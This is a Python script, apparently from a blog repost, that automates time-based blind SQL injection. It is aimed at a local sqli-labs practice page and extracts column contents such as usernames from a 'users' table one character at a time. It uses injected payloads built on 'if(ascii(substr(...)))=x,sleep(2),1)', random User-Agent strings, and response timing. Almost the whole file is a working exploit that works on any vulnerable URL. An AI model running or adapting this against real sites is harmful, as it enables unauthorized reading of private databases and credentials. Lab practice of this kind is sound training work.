# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 22:10
@Auth : zhangxiang
@File :BlindInject_NumResult.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
from GetResultLength_Num import GetResultLength_Num
class BlindInject_NumResult:
def __init__(self):
pass
def StartInject_NumResult(self,url,code,resultList,TableName,numResult,ColumnName):
flag=0
#%20and%20if(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),1,1)=%27e%27,sleep(5),1)
for num in range(0, numResult+1):
url = url
judgeStr = "%20and%20if(ascii(substr((select%20group_concat(ColumnName)%20from%20TableName" \
"),changeNum,1))=%27replaceStr%27,sleep(2),1)"
submitStr = "&submit=0x5375626D6974%23"
patternTableName = r"TableName"
replaceTableName = TableName
changeName1 = re.sub(patternTableName, replaceTableName, judgeStr)
patternColumnName = r"ColumnName"
replaceColumnName = ColumnName
changeName2 = re.sub(patternColumnName, replaceColumnName, changeName1)
pattern1 = r"changeNum"
replace1 = str(num)
FisWord = re.sub(pattern1, replace1, changeName2)
for x in range(44,123):#用ascii码判断,排除大小写错误
asciiNum = str(x)
word = FisWord + submitStr
# 正则chr(asciiNum)
pattern2 = r"replaceStr"
replace2 = asciiNum
SeWord = re.sub(pattern2, replace2, word)
full_url = url + SeWord
# print(full_url)
# 2.发请求保存到本地
headers = {'User-Agent':random.choice(ua_list)}
startTime = time.time()
req = request.Request(url=full_url, headers=headers)
res = request.urlopen(req)
endTime = time.time()
allTime = endTime - startTime
# print(allTime)
# print(flag)
if (resultList[flag] == "None"):
print("注入结束")
return resultList
if (allTime > 2):
print("*" * 200)
asciiRe = chr(x)
resultList.append(asciiRe)
print("得到盲注结果:" + str(resultList))
print("注入的payload:" + full_url)
print("使用的时间:" + str(allTime))
print("*" * 200)
flag = flag+1
else:
pass
return resultList
def getStr(self,resultList): # 将列表值转为字符串
resultList.pop(0)
list2 = [str(i) for i in resultList]
strList = ''.join(list2)
return strList
if __name__ == '__main__':
BlindInject_NumResult = BlindInject_NumResult()
GetResultLength_Num = GetResultLength_Num()
TableName = "users"
ColumnName="username"
resultList = ["开始"]
path = './code2.txt'
url = "http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-2/?id=1"
f = open(path, 'r', encoding='utf-8')
code = f.read()
print(resultList[0])
print("注入中,请稍等:")
numResult = GetResultLength_Num.StartGetResultLength_Num(url,TableName,ColumnName)
print("该字段中的内容的长度为:" + str(numResult))
resultList = BlindInject_NumResult.StartInject_NumResult(url,code,resultList,TableName,numResult,ColumnName)
strList = BlindInject_NumResult.getStr(resultList)
print("该字段中的内容有:"+strList)
版权声明:本文为DMHY123原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。